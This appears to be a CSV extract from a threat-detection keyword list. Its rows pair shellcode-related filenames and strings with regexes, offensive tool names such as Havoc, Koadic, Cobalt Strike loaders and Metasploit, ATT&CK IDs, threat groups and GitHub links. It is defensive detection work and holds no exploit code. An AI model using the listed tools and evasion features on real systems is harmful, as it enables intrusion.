"*shellcode inject *",".{0,1000}shellcode\sinject\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","59304"
"*Shellcode Injected Successfully*",".{0,1000}Shellcode\sInjected\sSuccessfully.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","59305"
"*Shellcode injection complete!*",".{0,1000}Shellcode\sinjection\scomplete!.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","59306"
"*Shellcode path changed:*shellcode_path*",".{0,1000}Shellcode\spath\schanged\:.{0,1000}shellcode_path.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","59307"
"*Shellcode Process Hollowing.csproj*",".{0,1000}Shellcode\sProcess\sHollowing\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59308"
"*Shellcode Process Hollowing.csproj*",".{0,1000}Shellcode\sProcess\sHollowing\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59309"
"*Shellcode Process Injector.ps1*",".{0,1000}Shellcode\sProcess\sInjector\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59310"
"*shellcode spawn *",".{0,1000}shellcode\sspawn\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","59311"
"*shellcode*shellcode.bin*",".{0,1000}shellcode.{0,1000}shellcode\.bin.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","59312"
"*shellcode.asm*",".{0,1000}shellcode\.asm.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","N/A","5","460","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z","59313"
"*shellcode.bin.donut*",".{0,1000}shellcode\.bin\.donut.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","59314"
"*Shellcode.x64.bin*",".{0,1000}Shellcode\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","59315"
"*shellcode_dll.dll*",".{0,1000}shellcode_dll\.dll.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","","N/A","","","","59316"
"*shellcode_dll\*",".{0,1000}shellcode_dll\\.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","N/A","","N/A","","","","59317"
"*shellcode_dotnet2js*",".{0,1000}shellcode_dotnet2js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","59318"
"*shellcode_dropper.c*",".{0,1000}shellcode_dropper\.c.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","59319"
"*shellcode_dynwrapx*",".{0,1000}shellcode_dynwrapx.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","59320"
"*Shellcode_encryption.exe*",".{0,1000}Shellcode_encryption\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","N/A","10","10","412","47","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z","59321"
"*shellcode_exec.py*",".{0,1000}shellcode_exec\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","59322"
"*shellcode_generator.*",".{0,1000}shellcode_generator\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","59323"
"*shellcode_generator_help.html*",".{0,1000}shellcode_generator_help\.html.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","59324"
"*shellcode_inject.csproj*",".{0,1000}shellcode_inject\.csproj.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","N/A","10","1498","256","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z","59325"
"*shellcode_inject.rb*",".{0,1000}shellcode_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59326"
"*shellcode_injectproc.xml*",".{0,1000}shellcode_injectproc\.xml.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","59327"
"*ShellCode_Loader.py*",".{0,1000}ShellCode_Loader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","N/A","10","10","412","47","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z","59328"
"*shellcode1 += b*",".{0,1000}shellcode1\s\+\=\sb.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","59329"
"*shellcode20.exe*",".{0,1000}shellcode20\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","N/A","10","10","20","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z","59330"
"*Shellcode2VBA(*",".{0,1000}Shellcode2VBA\(.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#content","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","59331"
"*Shellcode2VBAFunc(*",".{0,1000}Shellcode2VBAFunc\(.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#content","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","59332"
"*Shellcode2VBAFunc*",".{0,1000}Shellcode2VBAFunc.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","59333"
"*shellcode30.exe*",".{0,1000}shellcode30\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","N/A","10","10","20","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z","59334"
"*shellcode35.exe*",".{0,1000}shellcode35\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","N/A","10","10","20","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z","59335"
"*shellcode40.exe*",".{0,1000}shellcode40\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 